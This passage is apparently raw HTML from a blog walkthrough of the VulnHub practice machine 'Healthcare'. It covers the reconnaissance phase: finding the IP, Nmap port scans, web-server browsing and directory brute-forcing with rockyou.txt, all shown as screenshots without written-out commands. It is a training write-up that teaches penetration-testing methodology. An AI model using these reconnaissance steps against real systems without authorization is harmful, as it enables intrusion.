src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhGAZ2uDjbCopVYBK7ERcxQNj25YJ6YPoH79eLLAP6TFqzSDZz5YFUuGrbegyXZ8o7B8A-UvoA81MSGyfMMDzHZsFd55EOS3MUW03djozGYgmjLLBTMpeqw_WGrklQkalPmz6K8SdTjbFo6WZjsMo6fh5eeAli2mxU-2zoUPoNVLeaLszgI0daUIZwk1g=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #3d85c6; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Healthcare&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;-&amp;nbsp; &lt;b&gt;Healthcare&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/healthcare-1,522/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/healthcare-1,522/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgFT8qUejyesWUJQMOTQUJe_qhtWnQSxMUl4vekukC_qNJMYNarROfo57Wr5vd4e0d2_okSRxv2IPFl1HHFgzK7K4GoapOMyUJML8gU2QujRYpwjqsci9AmVRXxpysDhLTTzECvWbJhL9x_nWLghjIlRH0XazfLgFzAHQSbYixm5LKdS7Q9dgeCMfimKw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;597&quot; data-original-width=&quot;967&quot; height=&quot;386&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgFT8qUejyesWUJQMOTQUJe_qhtWnQSxMUl4vekukC_qNJMYNarROfo57Wr5vd4e0d2_okSRxv2IPFl1HHFgzK7K4GoapOMyUJML8gU2QujRYpwjqsci9AmVRXxpysDhLTTzECvWbJhL9x_nWLghjIlRH0XazfLgFzAHQSbYixm5LKdS7Q9dgeCMfimKw=w625-h386&quot; width=&quot;625&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Discovering IP 192.168.1.46:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiuLpOaN6SPBx5rptmSgReN7skR2V3C-xJLRJe2KYI2M_0fj_mYbtjx1VVqlLP52nw-JzlsrOL-PvaEPrnSAO1gqMKNm24aCRbMPjlJB1-aTsFYaCBHDgl_FGSn6rQ9Q4Mtr8uACbskd8Sx6CMSmTQIRbczXxfbi570XUhE4R-jzU6VJlDjtW8B3z1TuA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;438&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiuLpOaN6SPBx5rptmSgReN7skR2V3C-xJLRJe2KYI2M_0fj_mYbtjx1VVqlLP52nw-JzlsrOL-PvaEPrnSAO1gqMKNm24aCRbMPjlJB1-aTsFYaCBHDgl_FGSn6rQ9Q4Mtr8uACbskd8Sx6CMSmTQIRbczXxfbi570XUhE4R-jzU6VJlDjtW8B3z1TuA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEihm2lEHxp2Z9Jst_TVIt3ftbwXSrTNlbhvWb5BkdwC6bl6JTmpWJ28J9MvI9r-0jhFflxjEdQ1Q4yQltKy-Bmcpt0QPnTzG85pNDHypQchPkVya4SbHuwafI7JO_7HM5-locy5DmbHRgyvHMREJOgey86bXk65ktdAnmevWipyPx8QN3EExmwHUG3itQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;310&quot; data-original-width=&quot;829&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEihm2lEHxp2Z9Jst_TVIt3ftbwXSrTNlbhvWb5BkdwC6bl6JTmpWJ28J9MvI9r-0jhFflxjEdQ1Q4yQltKy-Bmcpt0QPnTzG85pNDHypQchPkVya4SbHuwafI7JO_7HM5-locy5DmbHRgyvHMREJOgey86bXk65ktdAnmevWipyPx8QN3EExmwHUG3itQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning with Nmap:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjk6LPPGF2obIM2E8Zi4mKeq2fuzeq3hh-z-96rwBbHCHzWprMTC_nQ3chrt4gGhUTUOunVS7Mo0_9Amii88gWNuYmKGAQibJKaKpdCLNo1do0F9DlxoN7Sd8D9o0Lr5d6IIEEEkZQwJTjTru5vVdT3HG6Gt_kzc6SYfH6u_Uveu08i9e3NYl51ZnBgWA&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;213&quot; data-original-width=&quot;435&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjk6LPPGF2obIM2E8Zi4mKeq2fuzeq3hh-z-96rwBbHCHzWprMTC_nQ3chrt4gGhUTUOunVS7Mo0_9Amii88gWNuYmKGAQibJKaKpdCLNo1do0F9DlxoN7Sd8D9o0Lr5d6IIEEEkZQwJTjTru5vVdT3HG6Gt_kzc6SYfH6u_Uveu08i9e3NYl51ZnBgWA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;- Scanning deeper port 21:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh1HPlSQgnXlUIOImudjjeKoBXOYDfvrXhdMD4qiNFCK92XIOh_G8FWjrQE2XxrubADzZ82_2cTpIGAoWLM9nDc-MbirNb95kOQWam6PntM3ndUTkWPIEK4vA66TP6SbZekhGp_dVUsII9JSbG9GEHJLYGcB_gK67Dr01BAWHxQyZbvdToxRSjND--Jvg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;212&quot; data-original-width=&quot;436&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEh1HPlSQgnXlUIOImudjjeKoBXOYDfvrXhdMD4qiNFCK92XIOh_G8FWjrQE2XxrubADzZ82_2cTpIGAoWLM9nDc-MbirNb95kOQWam6PntM3ndUTkWPIEK4vA66TP6SbZekhGp_dVUsII9JSbG9GEHJLYGcB_gK67Dr01BAWHxQyZbvdToxRSjND--Jvg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Scanning deeper port 80:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjuH_ot0g_u55kXFO08lMuW-WCN92b-frs_JhsLg3clConjvqoUMj1FOUewPpAWj2fs5wqVEqTLj5JWVVqhoJ9jvLrzBxHzo90JUn3peRtiu7UNH8NMjEBN0rBI-S9wydQRYOaLt3wpVmQCSDc7jGJ1zEY2KOff9XA3exuel49xyglIvOM02iWLTWRLCQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;322&quot; data-original-width=&quot;449&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjuH_ot0g_u55kXFO08lMuW-WCN92b-frs_JhsLg3clConjvqoUMj1FOUewPpAWj2fs5wqVEqTLj5JWVVqhoJ9jvLrzBxHzo90JUn3peRtiu7UNH8NMjEBN0rBI-S9wydQRYOaLt3wpVmQCSDc7jGJ1zEY2KOff9XA3exuel49xyglIvOM02iWLTWRLCQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Browsing the web server:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEipknRJ_08X6iwBj_OI57IQru_vzKGxEpraziSWu_tsSMUthJbWpc_6UkHXG8O2VZGCpT5X_nJv2YjzJ92HtPfenRvmX3nPsdzejFFSj_KZDW4sfbGrYLWtC4uO_OZds7dZRxYLJ3c9VVv44Z-6L1YWscXq-jnbXoV-GW6JK75WihL1P6wpCwrR1hqvQQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;636&quot; data-original-width=&quot;804&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEipknRJ_08X6iwBj_OI57IQru_vzKGxEpraziSWu_tsSMUthJbWpc_6UkHXG8O2VZGCpT5X_nJv2YjzJ92HtPfenRvmX3nPsdzejFFSj_KZDW4sfbGrYLWtC4uO_OZds7dZRxYLJ3c9VVv44Z-6L1YWscXq-jnbXoV-GW6JK75WihL1P6wpCwrR1hqvQQ=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- View-sourcing there are some misleading information:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjCOjG9xkkiXpVXa5H3seGNjnP_8pJ5yCjdXY1X2eqKVtARxNN9F272i4XVoT3q_L2iityxzdPnXVD3vBqrB0kmGQzpoueyt7yS6TSKN0EVDrvv-FuRPTyizaJ21u84w2t-wrV3f32qRMS2GSiAXQu9Hd673aZuM7ZUqZpvFPooXu47zXPJv5zVZHwK1A&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;400&quot; data-original-width=&quot;817&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjCOjG9xkkiXpVXa5H3seGNjnP_8pJ5yCjdXY1X2eqKVtARxNN9F272i4XVoT3q_L2iityxzdPnXVD3vBqrB0kmGQzpoueyt7yS6TSKN0EVDrvv-FuRPTyizaJ21u84w2t-wrV3f32qRMS2GSiAXQu9Hd673aZuM7ZUqZpvFPooXu47zXPJv5zVZHwK1A=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- For instance folder &lt;b&gt;/admin&lt;/b&gt; leads to nothing:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjWFZN-anGgmGeMiq2aIQY-7X-VrTHv6CIdH745BoQ_brJMId3lQrfrD-qlxaoYiQ5VMa-AlE7flcHoPq4XZV97V0PAIfODabOfqViW9vl-15H7uG57r54QKzyDSKRrA4awK-bSYXXpz68YjA_dMAZKloNrTHO4UOf4yF_ajNjj9m7edCWBIHs2L2xYbg&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;390&quot; data-original-width=&quot;616&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjWFZN-anGgmGeMiq2aIQY-7X-VrTHv6CIdH745BoQ_brJMId3lQrfrD-qlxaoYiQ5VMa-AlE7flcHoPq4XZV97V0PAIfODabOfqViW9vl-15H7uG57r54QKzyDSKRrA4awK-bSYXXpz68YjA_dMAZKloNrTHO4UOf4yF_ajNjj9m7edCWBIHs2L2xYbg=s16000&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Dirbusting with &lt;b&gt;rockyou.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEib4j0xnwyFXXw98A-Ub9lrCHbablNo0or6qIUWbE-i0xE_O6VmV8B1ZpynJUB4yxippnl-0sJjVFwoJ1xdBj60vcqN0WQtXsS6vuTZF4BQby9Yb9uETCxqp1HVk0HNkPijkn2qogyZsBc76CjOzE2UNYxw9Pfya9hUB3jDzt0r4JwNu5zRRj2a16DjbA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img 